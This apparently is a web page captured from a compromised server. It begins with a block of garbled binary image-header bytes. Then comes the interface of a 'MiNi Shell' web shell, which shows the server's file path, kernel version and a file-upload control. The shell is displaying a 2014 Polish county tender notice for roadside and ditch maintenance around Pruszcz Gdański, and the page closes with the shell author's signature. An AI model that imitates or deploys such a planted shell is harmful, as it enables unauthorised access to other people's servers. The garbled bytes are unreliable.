JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140217/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140217/30953-N-2014.html

<p class="kh_header"><b>Pruszcz Gdański: Wykonanie prac  konserwacyjnych  związanych z utrzymaniem urządzeń melioracji  wodnych,  utwardzeniem  i wyrównaniem  poboczy  oraz   dróg   gruntowych   oraz   ścinką    zawyżonych  poboczy  dróg  powiatowych  położonych   na  terenie  Powiatu Gdańskiego w 2014 r.</b><br>
<b>Numer ogłoszenia: 30953 - 2014; data zamieszczenia: 17.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Gdański z siedzibą w Pruszczu Gdańskim reprezentowany przez Zarząd Powiatu Gdańskiego , ul. Wojska Polskiego 16, 83-000 Pruszcz Gdański, woj. pomorskie, tel. 058 6834999, faks 058 6834899.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-gdanski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie prac  konserwacyjnych  związanych z utrzymaniem urządzeń melioracji  wodnych,  utwardzeniem  i wyrównaniem  poboczy  oraz   dróg   gruntowych   oraz   ścinką    zawyżonych  poboczy  dróg  powiatowych  położonych   na  terenie  Powiatu Gdańskiego w 2014 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem  zamówienia  jest Wykonanie   prac   konserwacyjnych    związanych   z utrzymaniem urządzeń melioracji wodnych, utwardzeniem i wyrównaniem poboczy oraz   dróg   gruntowych   oraz   ścinką   zawyżonych   poboczy   dróg   powiatowych  położonych  na  terenie Powiatu Gdańskiego w 2014 r.

2. Zakres przedmiotu zamówienia:
 Usługa zostanie wykonana w ramach  3 zadań:
Zadanie  nr  1  -  Utwardzenie   i    wyrównanie    poboczy    oraz    dróg   gruntowych   położonych na terenie Powiatu Gdańskiego w 2014 r.
 Zakres prac obejmuje:
1.	Profilowanie nawierzchni gruntowych wraz z zagęszczeniem.
2.	Uzupełnienie nawierzchni gruntowych oraz wskazanych miejsc w poboczach kruszywem łamanym o uziarnieniu 0/31,5.
- roboty przygotowawcze;
- wbudowanie materiału wraz z zagęszczeniem;
- oczyszczenie terenu.

 Zadanie nr 2 -  Ścinka  zawyżonych   poboczy   dróg   powiatowych   położonych   na terenie Powiatu Gdańskiego w 2014 r.

Zakres prac obejmuje:
-  roboty przygotowawcze,
-  dostarczanie sprzętu i narzędzi na koszt własny Wykonawcy do miejsca ścinki,
-  ścięcie  poboczy  (bez  względu na  grubość  ścinki) z równoczesnym wyprofilowaniem 
   poboczy nadając im spadki poprzeczne,
-  wywiezienie uzyskanego urobku poza pas drogowy ,
-  profilowanie i zagęszczenie,
-  oczyszczenie nawierzchni bitumicznej po zakończeniu robót,
 -  odtransportowanie sprzętu i narzędzi,
-  oczyszczenie terenu po ścince zawyżonych poboczy,
-  zabezpieczenie   miejsca   ścinki   zgodnie   z   obowiązującymi   przepisami   o  ruchu  drogowym  (sporządzenie na  własny  koszt  i  przestrzeganie  sporządzonego projektu organizacji ruchu na czas wykonywanej usługi).

Zadanie  nr  3 -   Konserwacja   wraz    z    czyszczeniem   rowów   oraz   przepustów położonych  w ciągu dróg   powiatowych  dróg  powiatowych  położonych na  terenie Powiatu Gdańskiego w 2014 r.
Zakres prac obejmuje:
1.Oczyszczenie rowów do 0,5 m głębokości z wyprofilowaniem dna i skarp, usunięciem roślinności i zakrzaczeń oraz transportem urobku poza plac budowy i utylizacją.
2.Oczyszczenie wraz z  udrożnieniem przepustów o średnicy od O 0,3 m do O 0,6 m wraz z transportem urobku poza plac budowy oraz utylizacją

UWAGA:
Zamawiający zastrzega sobie możliwość zwiększenia zakresu przedmiotu zamówienia w ramach robót uzupełniających dla każdego z zadań.

3. Szczegółowy zakres przedmiotu  zamówienia określony  został  w  formularzach cenowych   stanowiących załącznik nr  4A, 4B, 4C, specyfikacji  technicznej stanowiącej  załącznik  nr   10   do   niniejszej   specyfikacji    istotnych    warunków    zamówienia    oraz  wykaz dróg  powiatowych ( załącznik nr 7 do SIWZ).
4.W ramach wyszczególnionych w ww. formularzu cenowym robót należy wykonać również  wszelkie roboty-prace pomocnicze, tymczasowe i towarzyszące, które są konieczne do prawidłowego wykonania przez Wykonawcę robót ujętych w formularzu cenowym, w tym  prace pomocnicze, tymczasowe i towarzyszące wynikające ze specyfikacji technicznej.
5.Odpady, śmieci powstałe w trakcie realizacji robót (rozbiórek) Wykonawca wywiezie  poza teren budowy i  będzie  z  nimi  postępował zgodnie z przepisami ustawy z dnia 14  grudnia 2012r. o odpadach (Dz. U. z 2013r. poz. 21).
6. Zamawiający  dopuszcza   powierzenie   wykonania   części   zamówienia  podwykonawcy/  podwykonawców , zgodnie z art. 36a ust.1 Ustawy.
7. W  przypadku  zatrudnienia  podwykonawcy /podwykonawców,  w oparciu o art. 36b ust. 1    Ustawy  Zamawiający  żąda  wskazania  przez  Wykonawcę  w  ofercie informacji na temat   części zamówienia, których wykonanie zamierza powierzyć podwykonawcom (wzór zał. nr 8 do SIWZ)..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie  z   art. 36   ust.   2,  pkt. 3 ustawy,  Zamawiający  przewiduje  możliwość  udzielenia w okresie trwania umowy ewentualnych zamówień uzupełniających w trybie z wolnej ręki, których wartość nie przekroczy 50% wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust. 1 pkt. 6 ustawy PZP.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.20.00-5, 45.23.31.42-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wadium wnosi się przed upływem terminu składania ofert.
2.Wykonawca zobowiązany jest do wniesienia wadium w wysokości Zadanie nr 1 - w wysokości 400,00 zł, zadanie nr 2 - w wysokości 600,00 zł, zadanie nr 3 - w wysokości 1.300,00 zł. W przypadku jeżeli do godz. 11:30 dnia 26.02.2014 r . nie wpłynie wymagana kwota wadium na konto Zamawiającego, będzie to oznaczało, że wadium nie zostało wniesione.
W przypadku jeżeli do godz. 11:30 dnia 26.02.2014 r . nie wpłynie wymagana kwota wadium na konto Zamawiającego, będzie to oznaczało, że wadium nie zostało wniesione.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni  warunek za spełniony, gdy Wykonawcy wykażą się prowadzeniem działalności w zakresie robót drogowych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni  warunek za spełniony, gdy Wykonawcy wykażą się wykonaniem  w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest  krótszy  -  tym okresie, minimum 2 usług odpowiadających swym rodzajem przedmiotowi zamówienia (z podaniem ich  wartości  oraz  daty  wykonania  i  podmiotów na rzecz których usługi zostały wykonane) o wartości łącznej  nie mniejszej niż 20.000 zł - dla każdego zadania. Do wykazu (zał. nr 6 do SIWZ) należy dołączyć dowody potwierdzające należyte wykonanie wymienionych usług.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga dokumentów potwierdzających  spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga dokumentów potwierdzających  spełnienie tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga dokumentów potwierdzających  spełnienie tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy (wzór zał. nr 1A,1B,1C do SIWZ),
2. Podpisany wzór umowy (zał. nr  5A,5B,5C  do SIWZ),
3. Wykaz wykonanych usług ( wzór zał. nr 6 do SIWZ).
4.Informacja   na   temat  części  zamówienia,   których   wykonanie   wykonawca  zamierza powierzyć podwykonawcom (wzór zał.  nr 8 do SIWZ),
5.Oświadczenie o przynależności do grupy kapitałowej  (zał. nr 9 do SIWZ),
6. Potwierdzenie   wniesienia wadium: potwierdzenie   dokonanego   przelewu lub  oryginał  wraz z potwierdzoną kopią dokumentu stanowiącego wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 Ustawy Prawo Zamówień Publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym zmiany stawki podatku VAT, mające wpływ na wysokość ceny brutto za świadczoną usługę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-gdanski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Pruszczu Gdańskim, ul. Wojska Polskiego 16, pok. nr 122. Specyfikacja nieodpłatna  -  ewentualne koszty przesyłki ..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2014 godzina 11:30, miejsce: Starostwo Powiatowe w Pruszczu Gdańskim, ul. Wojska Polskiego 16, 83 - 000 Pruszcz Gdański, Sekretariat pok. Nr 101
Termin otwarcia ofert: 26.01.2014 r., o godz. 12:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie  nr  1  -  Utwardzenie   i    wyrównanie    poboczy    oraz    dróg   gruntowych   położonych na terenie Powiatu Gdańskiego w 2014 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -  Utwardzenie   i    wyrównanie    poboczy    oraz    dróg   gruntowych   położonych na terenie Powiatu Gdańskiego w 2014 r.
Zakres prac obejmuje:
1.Profilowanie nawierzchni gruntowych wraz z zagęszczeniem.
2.Uzupełnienie nawierzchni gruntowych oraz wskazanych miejsc w poboczach kruszywem łamanym o uziarnieniu 0/31,5.
- roboty przygotowawcze;
- wbudowanie materiału wraz z zagęszczeniem;
- oczyszczenie terenu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 -  Ścinka  zawyżonych   poboczy   dróg   powiatowych   położonych   na      
 terenie Powiatu Gdańskiego w 2014 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ścinka  zawyżonych   poboczy   dróg   powiatowych   położonych   na      
 terenie Powiatu Gdańskiego w 2014 r.
Zakres prac obejmuje:
-  roboty przygotowawcze,
-  dostarczanie sprzętu i narzędzi na koszt własny Wykonawcy do miejsca ścinki,
-  ścięcie  poboczy  (bez  względu na  grubość  ścinki) z równoczesnym wyprofilowaniem  poboczy nadając im spadki poprzeczne,
-  wywiezienie uzyskanego urobku poza pas drogowy ,
-  profilowanie i zagęszczenie,
-  oczyszczenie nawierzchni bitumicznej po zakończeniu robót,
 -  odtransportowanie sprzętu i narzędzi,
-  oczyszczenie terenu po ścince zawyżonych poboczy,
-  zabezpieczenie   miejsca   ścinki   zgodnie   z   obowiązującymi   przepisami   o  ruchu  drogowym  (sporządzenie na  własny  koszt  i  przestrzeganie  sporządzonego projektu  organizacji ruchu na czas wykonywanej usługi)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.20.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie  nr  3 -   Konserwacja   wraz    z    czyszczeniem   rowów   oraz   przepustów   położonych  w ciągu dróg   powiatowych  dróg  powiatowych  położonych na  terenie   Powiatu Gdańskiego w 2014 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja   wraz    z    czyszczeniem   rowów   oraz   przepustów                 
 położonych  w ciągu dróg   powiatowych  dróg  powiatowych  położonych na  terenie Powiatu Gdańskiego w 2014 r.
 Zakres prac obejmuje:
1.Oczyszczenie rowów do 0,5 m głębokości z wyprofilowaniem dna i skarp, usunięciem roślinności i zakrzaczeń oraz transportem urobku poza plac budowy i  utylizacją.
2.Oczyszczenie wraz z  udrożnieniem przepustów o średnicy od O 0,3 m do O 0,6 m wraz z transportem urobku poza plac budowy oraz utylizacją

UWAGA:
Zamawiający zastrzega sobie możliwość zwiększenia zakresu przedmiotu zamówienia w ramach robót uzupełniających dla każdego z zadań..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.20.00-5, 45.23.31.42-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com